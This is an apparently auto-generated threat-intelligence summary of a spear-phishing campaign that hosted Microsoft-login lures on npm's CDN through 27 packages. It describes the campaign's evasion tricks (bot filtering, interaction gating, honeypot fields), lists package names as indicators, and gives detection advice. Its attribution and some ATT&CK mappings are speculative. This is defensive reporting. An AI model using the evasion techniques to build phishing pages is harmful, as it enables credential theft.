Full Report
Cybersecurity researchers have disclosed details of what has been described as a "sustained and targeted" spear-phishing campaign that has published over two dozen packages to the npm registry to facilitate credential theft. The activity, which involved uploading 27 npm packages from six different npm aliases, has primarily targeted sales and commercial personnel at critical
Analysis Summary
# Tool/Technique: Malicious npm Packages Used for Spear-Phishing Infrastructure (Unnamed Campaign)
## Overview
A "sustained and targeted" spear-phishing campaign utilizing 27 malicious packages published to the npm registry across six distinct aliases. The primary goal was credential theft by repurposing npm's package Content Delivery Network (CDN) infrastructure to host client-side lures impersonating document-sharing portals and Microsoft sign-in pages.
## Technical Details
- Type: Technique/Infrastructure Abuse
- Platform: Client-side (Browser execution via delivered HTML/JavaScript)
- Capabilities: Hosting phishing lures via npm CDN, credential harvesting, anti-analysis controls.
- First Seen: Activity disclosed around December 29, 2026 (5-month prior operation).
## MITRE ATT&CK Mapping
The activity primarily focuses on Delivery and Collection phases using compromised infrastructure.
- **TA0001 - Initial Access**
- T1566 - Phishing
- T1566.001 - Spearphishing Attachment (Indirectly, by using infrastructure hosting the lure)
- **TA0011 - Command and Control**
- T1071 - Application Layer Protocol
- T1071.001 - Web Protocols (Leveraging legitimate CDN infrastructure)
- **TA0008 - Lateral Movement** (If credentials are used post-harvesting)
## Functionality
### Core Capabilities
- **Phishing Infrastructure Hosting:** Using the npm registry CDN as durable, resilient hosting for static phishing content (HTML/JavaScript).
- **Lure Delivery:** Serving client-side JavaScript and HTML lures that mimic secure document-sharing portals.
- **Targeted Engagement:** Pre-filling Microsoft sign-in forms with target victim email addresses (25 specific email addresses hardcoded).
- **Targeting:** Focusing on sales and commercial personnel at critical infrastructure-adjacent organizations in the U.S. and Allied nations (spanning manufacturing, industrial automation, plastics, and healthcare).
### Advanced Features
- **Anti-Analysis Checks:** Implementing client-side filtering to challenge analysis efforts, specifically filtering out bots and evading sandboxes.
- **Interaction Requirement:** Requiring mouse or touch input before redirecting victims to the actor-controlled credential harvesting infrastructure.
- **Code Obfuscation:** Utilizing obfuscated or heavily minified JavaScript code to hinder automated inspection.
- **Honeypot Fields:** Including hidden form fields designed to be populated by automated crawlers, acting as a second layer of defense against automated inspection.
- **AitM Overlap:** Domains packed into the packages overlapped with Adversary-in-the-Middle (AitM) phishing infrastructure associated with **Evilginx**.
## Indicators of Compromise
(Note: Specific hashes/C2 domains were not provided in the summary, only package names and aliases.)
- File Hashes: N/A (Focus is on package content/delivery mechanism)
- File Names: 27 distinct npm package names were used, including: `adril7123`, `androidvoues`, `onedrive-verification`, `sync365`, `secure-docs-app`, etc.
- Registry Keys: N/A
- Network Indicators: Associated domains overlap with Evilginx infrastructure (Specific domains defanged: `[Overlaps with Evilginx infrastructure]`)
- Behavioral Indicators: Execution of client-side JS upon loading the URI referencing the package content, checks for user interaction, population of hidden/honeypot input fields.
## Associated Threat Actors
- Unspecified Threat Actors (This campaign is noted as distinct from the earlier "Beamglea" campaign, though both abuse npm infrastructure).
- The overlap in AitM infrastructure suggests potential links to groups known to utilize Evilginx (e.g., Magecart affiliates, specific state-sponsored groups, or financially motivated groups).
## Detection Methods
- Signature-based detection: Monitoring npm registry for the listed suspicious package names or known malicious aliases.
- Behavioral detection: Detecting client-side JavaScript that attempts to require user interaction before redirection, or code exhibiting high obfuscation/minification within legitimate package imports. Monitoring for the loading of content from known npm CDNs that is subsequently interpreted as HTML/phishing logic.
- YARA rules: Potentially applicable to the static JavaScript/HTML content embedded within the package sources once extracted.
## Mitigation Strategies
- **npm Security:** Monitoring organization-specific package usages and external dependencies for unusual behavior, especially those targeting common SSO providers (like Microsoft).
- **Supply Chain Hardening:** Limiting code execution from untrusted sources; treating package contents (even from community registries) as potentially hostile until verified.
- **User Training:** Emphasizing user awareness regarding credential harvesting pages, even when accessed via seemingly legitimate links or document portals. Focusing training on indicators of Evilginx/AitM attacks.
## Related Tools/Techniques
- **Evilginx:** Overlap in associated AitM phishing infrastructure.
- **Beamglea Campaign:** A previous, separate campaign that also leveraged npm packages for credential harvesting but used different delivery mechanics (minimal redirect scripts vs. self-contained execution flow).
- **Supply Chain Compromise (General):** Utilizing legitimate software infrastructure (npm CDN) for malicious distribution.